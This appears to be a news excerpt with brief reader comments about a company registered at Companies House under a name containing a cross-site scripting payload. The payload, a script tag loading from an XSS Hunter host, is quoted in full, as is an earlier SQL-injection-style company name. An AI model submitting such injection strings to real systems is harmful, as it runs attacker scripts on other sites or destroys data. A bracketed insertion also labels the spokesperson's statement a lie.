He now says he didn't realise that Companies House was actually vulnerable to the extremely simple technique he used, known as "cross-site scripting", which allows an attacker to run code from one website on another.
The original name of the company was ""><SCRIPT SRC=HTTPS://MJT.XSS.HT> LTD". By beginning the name with a quotation mark and chevron, any site which failed to properly handle the HTML code would have mistakenly thought the company name was blank, and then loaded and executed a script from the site XSS Hunter, which helps developers find cross-site scripting errors.
Similar names have been registered in the past, such as "; DROP TABLE "COMPANIES";-- LTD", a wry attempt to carry out an attack known as SQL injection, inspired by a famous XKCD webcomic, but this was the first such name to have prompted a response. Companies House has retroactively removed the original name from its data feeds, and all documentation referring to its original moniker now reads simply "Company name available on request". [...]
He did not realise it would be an issue, he said, because characters including > and " are explicitly allowed as company names, which suggested that the agency had put security measures in place to prevent such attacks.
A Companies House spokesperson [lied]: "A company was registered using characters that could have presented a security risk to a small number of our customers, if published on unprotected external websites."
I love that they called it a "chevron".
Chevron 1 was, apparently, not encoded.